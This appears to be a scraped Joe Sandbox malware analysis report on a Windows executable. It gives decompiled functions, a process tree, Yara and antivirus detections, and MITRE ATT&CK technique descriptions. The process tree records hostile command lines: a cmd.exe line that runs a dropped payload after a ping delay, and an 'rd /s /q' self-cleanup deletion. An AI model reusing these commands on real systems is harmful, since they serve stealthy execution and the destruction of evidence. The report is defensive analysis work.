Instruction ID: 2ce7878e2e45b983fac23937024426c5bb2166d395f322666b5fa2fe93735dc8
Opcode Fuzzy Hash: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
Instruction Fuzzy Hash: 2A11C231845114AFCB10DF94DC44EEEBB78FF48350F10849EF862A7260DBB85945CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00409027 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00409027(void* __esi) {
				signed int _v4;
				char _v13;
				char _v32;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _t28;

				L004153D0();
				_v32 = _v13;
				 *0x417230(0, __esi);
				_t28 = "recursion sub-expression cannot be quantified";
				 *0x417234(_t28, strlen(_t28));
				_v4 = _v4 & 0x00000000;
				 *0x417218( &_v32);
				_push(0x4196f8);
				_push( &_v60);
				_v60 = 0x417698;
				L004153FE();
				_push(_v64);
				return E0040A9C0( &_v60, _v68, _v64);
			}

0x0040902c
0x0040903d
0x00409040
0x00409046
0x00409057
0x0040905d
0x00409068
0x00409071
0x00409076
0x00409077
0x0040907e
0x00409087
0x00409096

APIs

_EH_prolog.MSVCRT ref: 0040902C
strlen.MSVCRT ref: 0040904C
_CxxThrowException.MSVCRT ref: 0040907E

Strings

recursion sub-expression cannot be quantified, xrefs: 00409046, 0040904B, 00409053

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: recursion sub-expression cannot be quantified
API String ID: 1214428233-1191606697
Opcode ID: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
Instruction ID: 10e607d7a6f2a3e9ba9a672d8d2b0ae7a902c0b6b7616f674ba24b2d4bce1438
Opcode Fuzzy Hash: fbb796b0e515c8facd89e1b44fde87da6dc0ac1903ddd3c03e83496d647a9f37
Instruction Fuzzy Hash: 9FF0813684111CFBCF00AB95EC45ADD7B38FF08350F008056F815A6061DBB84644CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004133FE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E004133FE() {
				intOrPtr _t15;
				void* _t27;
				char* _t28;
				void* _t30;

				L004153D0();
				_t15 =  *((intOrPtr*)(_t30 + 0xc));
				if(_t15 ==  *((intOrPtr*)(_t30 + 8))) {
					 *((char*)(_t30 - 0x1c)) =  *((intOrPtr*)(_t30 + 0xf));
					 *0x417230(0, _t27);
					_t28 = "expecting end of character set";
					 *0x417234(_t28, strlen(_t28));
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					 *0x417218(_t30 - 0x1c);
					_t15 = _t30 - 0x38;
					_push(0x4196f8);
					_push(_t15);
					 *((intOrPtr*)(_t30 - 0x38)) = 0x417698;
					L004153FE();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t15;
			}

0x00413403
0x0041340b
0x00413411
0x0041341c
0x0041341f
0x00413425
0x00413436
0x0041343c
0x00413447
0x0041344d
0x00413450
0x00413455
0x00413456
0x0041345d
0x00413462
0x00413466
0x0041346e

APIs

_EH_prolog.MSVCRT ref: 00413403
strlen.MSVCRT ref: 0041342B
_CxxThrowException.MSVCRT(?,004196F8), ref: 0041345D

Strings

expecting end of character set, xrefs: 00413425, 0041342A, 00413432

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: expecting end of character set
API String ID: 1214428233-2681132798
Opcode ID: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
Instruction ID: fb0b6af9fdd803d394df8d1c0f25a948e4417c071c105f155f0c22cdd341b05e
Opcode Fuzzy Hash: 7219f07c24a79d8181a22715a1ffc87983ad203cd271f7cc1843931ab176e907
Instruction Fuzzy Hash: 49014471C41109EFCB01EF94E885BED7B78EF04755F108056F822D7151DBB85685CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004073CC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E004073CC() {
				void* _t24;
				char* _t25;
				void* _t27;

				L004153D0();
				 *((char*)(_t27 - 0x20)) =  *((intOrPtr*)(_t27 - 0xd));
				 *0x417230(0, _t24);
				_t25 = "look-ahead assertion cannot be quantified";
				 *0x417234(_t25, strlen(_t25));
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				 *0x417218(_t27 - 0x20);
				_push(0x4196f8);
				_push(_t27 - 0x3c);
				 *((intOrPtr*)(_t27 - 0x3c)) = 0x417698;
				L004153FE();
				return 1;
			}

0x004073d1
0x004073e2
0x004073e5
0x004073eb
0x004073fc
0x00407402
0x0040740d
0x00407416
0x0040741b
0x0040741c
0x00407423
0x0040742b

APIs

_EH_prolog.MSVCRT ref: 004073D1
strlen.MSVCRT ref: 004073F1
_CxxThrowException.MSVCRT ref: 00407423

Strings

look-ahead assertion cannot be quantified, xrefs: 004073EB, 004073F0, 004073F8

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: look-ahead assertion cannot be quantified
API String ID: 1214428233-1240756859
Opcode ID: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
Instruction ID: 1721b6b3a732f0907001ba31f53c3af67a5e291595c0cbf9be71024513a692cd
Opcode Fuzzy Hash: 9e2f4fd4c15755663806f266f11c971fff55ce048fff76855c59b62dfc479332
Instruction Fuzzy Hash: E2F03035851118ABCB04AB94EC55ADD7B78BF59351F404096F821A2161DFB80549CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 0040267F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00402684
strlen.MSVCRT ref: 004026A4
_CxxThrowException.MSVCRT(?,004194D0), ref: 004026D7

Strings

invalid vector<T> subscript, xrefs: 0040269E, 004026A3, 004026AB

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: invalid vector<T> subscript
API String ID: 1214428233-3016609489
Opcode ID: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
Instruction ID: 7f0d4b690d67eaef1822860b9d25e2d5405d004bbf420f7a3b0005bfa06bd269
Opcode Fuzzy Hash: 32645d7027a1448dc9c7cd0a2fdd559ffa8faeac615e55df810cf06cfd7f0d5b
Instruction Fuzzy Hash: E5F03076C45118ABDB04EBE4EC49AED7B78FF18350F0040A6F811A3161DFB85545CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 00403810 Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

tolower.MSVCRT ref: 004039C6
toupper.MSVCRT ref: 004039EB
tolower.MSVCRT ref: 00403A3D
toupper.MSVCRT ref: 00403A8D

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: tolowertoupper
String ID:
API String ID: 1080271956-0
Opcode ID: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
Instruction ID: 36f9c2d77fe6c67efd501578e7725a05c9af3bd086344374b91f15e4db579863
Opcode Fuzzy Hash: e599ae38eb4c4bdec4b3ad466f712a7868cafc2f9f9f89be0026709ef1153904
Instruction Fuzzy Hash: 07A14D71A04205DFCB14CF64C9846AEBFB8BF08316F1481AAE855A7391C778EA45CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041346F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041346F(intOrPtr* _a4, intOrPtr _a8, char _a12) {
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t29;
				signed char _t33;
				signed char _t37;
				signed char _t40;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;

				_t57 = _a4;
				_t56 = _a8;
				_push(_t56);
				_push( *_t57);
				E004133FE();
				_t11 =  *_t57;
				_t33 =  *_t11;
				_t40 = _t33;
				_t59 = _t40 - 0x66;
				if(_t59 > 0) {
					_t41 = _t40 - 0x6e;
					if(_t41 == 0) {
						if(_a12 != 0) {
							_t33 = 0xa;
						}
						L39:
						 *_t57 = _t11 + 1;
						L40:
						return _t33;
					}
					_t42 = _t41 - 4;
					if(_t42 == 0) {
						if(_a12 != 0) {
							_t33 = 0xd;
						}
						goto L39;
					}
					_t44 = _t42;
					if(_t44 == 0) {
						if(_a12 != 0) {
							_t33 = 9;
						}
						goto L39;
					}
					_t46 = _t44;
					if(_t46 == 0) {
						if(_a12 != 0) {
							_t33 = 0xb;
						}
						goto L39;
					}
					if(_t46 != 0) {
						goto L39;
					}
					_t33 = 0;
					 *_t57 = _t11 + 1;
					while(E00402F9A( *((intOrPtr*)( *_t57))) != 0) {
						_t33 = (_t33 << 4) + E00402FBD( *((intOrPtr*)( *_t57)));
						 *_t57 =  *_t57 + 1;
						_push(_t56);
						_push( *_t57);
						E004133FE();
						_t58 = _t58 + 0xc;
					}
					goto L40;
				}
				if(_t59 == 0) {
					if(_a12 != 0) {
						_t33 = 0xc;
					}
					goto L39;
				}
				if(_t40 < 0x30) {
					goto L39;
				}
				if(_t40 <= 0x37) {
					_t33 = _t33 - 0x30;
					 *_t57 = _t11 + 1;
					while(1) {
						_t24 =  *_t57;
						_t50 =  *_t24;
						if(_t50 < 0x30 || _t50 > 0x37) {
							goto L40;
						}
						_push(_t56);
						_t33 = (_t33 - 6 << 3) + _t50;
						_t25 = _t24 + 1;
						_push(_t25);
						 *_t57 = _t25;
						E004133FE();
					}
					goto L40;
				}
				if(_t40 == 0x5c) {
					if(_a12 != 0) {
						_t33 = 0x5c;
					}
					goto L39;
				}
				if(_t40 == 0x61) {
					if(_a12 != 0) {
						_t33 = 7;
					}
					goto L39;
				}
				if(_t40 == 0x63) {
					_t27 = _t11 + 1;
					_push(_t56);
					_push(_t27);
					 *_t57 = _t27;
					E004133FE();
					_t29 =  *_t57;
					_t37 =  *_t29;
					 *_t57 = _t29 + 1;
					if(_t37 >= 0x61 && _t37 <= 0x7a) {
						_t37 =  *0x4172a4(_t37);
					}
					_t33 = _t37 ^ 0x00000040;
					goto L40;
				} else {
					if(_t40 == 0x65) {
						_t33 = 0x1b;
					}
					goto L39;
				}
			}

APIs

Part of subcall function 004133FE: _EH_prolog.MSVCRT ref: 00413403
Part of subcall function 004133FE: strlen.MSVCRT ref: 0041342B
Part of subcall function 004133FE: _CxxThrowException.MSVCRT(?,004196F8), ref: 0041345D

toupper.MSVCRT ref: 004134E9

Strings

a, xrefs: 004134D9
z, xrefs: 004134E0

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlentoupper
String ID: a$z
API String ID: 957254526-4151050625
Opcode ID: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
Instruction ID: b1aff326a2e06e5aad8b1cf850e00f7449f94b63455ed0c48128afb1fd7a013c
Opcode Fuzzy Hash: 8277708e309b7c437a6dfc9d7699ad9d0b7fa53085202667cbaf6d7db5bcf054
Instruction Fuzzy Hash: F341B6715451817EEB294E2884197FA3BDE9B17F0AF2C041FE4C587A92C66C4BC1C70E

Uniqueness

Uniqueness Score: -1.00%

Function 004023AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004023AE(intOrPtr __ecx) {
				void* _t22;
				char* _t23;
				void* _t25;
				void* _t28;

				L004153D0();
				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
				 *((char*)(__ecx + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8))));
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x417664;
				_t23 = __ecx + 0x18;
				 *((intOrPtr*)(_t28 - 4)) = 0;
				 *_t23 =  *((intOrPtr*)(_t28 + 0xb));
				 *0x417230(0, _t22, _t25, __ecx);
				 *((intOrPtr*)(__ecx + 0x28)) = _t23;
				 *((intOrPtr*)(__ecx)) = 0x41766c;
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return __ecx;
			}

0x004023b3
0x004023c2
0x004023c5
0x004023ca
0x004023cd
0x004023d0
0x004023d3
0x004023dc
0x004023e0
0x004023e3
0x004023e7
0x004023f0
0x004023f3
0x004023fd
0x00402405

APIs

_EH_prolog.MSVCRT ref: 004023B3

Strings

v$@, xrefs: 004023F3
>$@, xrefs: 004023D3

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: H_prolog
String ID: >$@$v$@
API String ID: 3519838083-1508283045
Opcode ID: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
Instruction ID: 2a2c642b6552ba3d24064c73d9aa280cfc44eb8d4c0d781014b5c2aac6b69bdf
Opcode Fuzzy Hash: 197faed4f41ed2a95b5947a493da987ecdbf76c1af6f413e88e6733cf9929da4
Instruction Fuzzy Hash: 84F032B1A04B819FC720CF6D84406DAFBF4AB99710B10896FE09AD3710D3B4A580CBA4

Uniqueness

Uniqueness Score: -1.00%

Target ID:	0
Start time:	11:58:31
Start date:	08/02/2023
Path:	C:\Users\user\Desktop\02hNixBIvP.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\02hNixBIvP.exe
Imagebase:	0x400000
File size:	272037 bytes
MD5 hash:	003F93A1F33EC617B46A87C98B19FD85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Target ID:	1
Start time:	11:58:32
Start date:	08/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	4
Start time:	11:58:33
Start date:	08/02/2023
Path:	C:\Users\user\AppData\Local\Temp\ifaie.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\\ifaie.exe "C:\Users\user\Desktop\02hNixBIvP.exe"
Imagebase:	0x400000
File size:	272305 bytes
MD5 hash:	A14885E3017A4DDC08143092526DFC7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: CN_Honker_Webshell, Description: Sample from CN Honker Pentest Toolset - file Webshell.exe, Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Author: Florian Roth (Nextron Systems)
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Target ID:	5
Start time:	11:58:34
Start date:	08/02/2023
Path:	C:\Program Files\lhnfbdjfh\hcl.exe
Wow64 process (32bit):	true
Commandline:	"c:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink C:\Users\user\AppData\Local\Temp\ifaie.exe
Imagebase:	0x3c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high

Target ID:	17
Start time:	11:59:08
Start date:	08/02/2023
Path:	C:\Program Files\lhnfbdjfh\hcl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
Imagebase:	0x3c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	18
Start time:	11:59:09
Start date:	08/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\Program Files\lhnfbdjfh"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	21
Start time:	11:59:17
Start date:	08/02/2023
Path:	C:\Program Files\lhnfbdjfh\hcl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\lhnfbdjfh\hcl.exe" "c:\Program Files\lhnfbdjfh\hclyc.dll",Hlink
Imagebase:	0x3c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	24
Start time:	11:59:18
Start date:	08/02/2023
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0xbf0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 02hNixBIvP.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\1.txt

C:\Program Files\lhnfbdjfh\hcl.exe

C:\Program Files\lhnfbdjfh\hclyc.dll

C:\Users\user\AppData\Local\Temp\ifaie.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
02hNixBIvP.exe

Function 004013B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
sleepCOMMON

Function 00401194 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 183
sleepfileprocessCOMMON

Function 00415410 Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 004010DF Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Function 004B5DAE Relevance: 5.2, APIs: 4, Instructions: 229
memoryCOMMON

Function 00401703 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

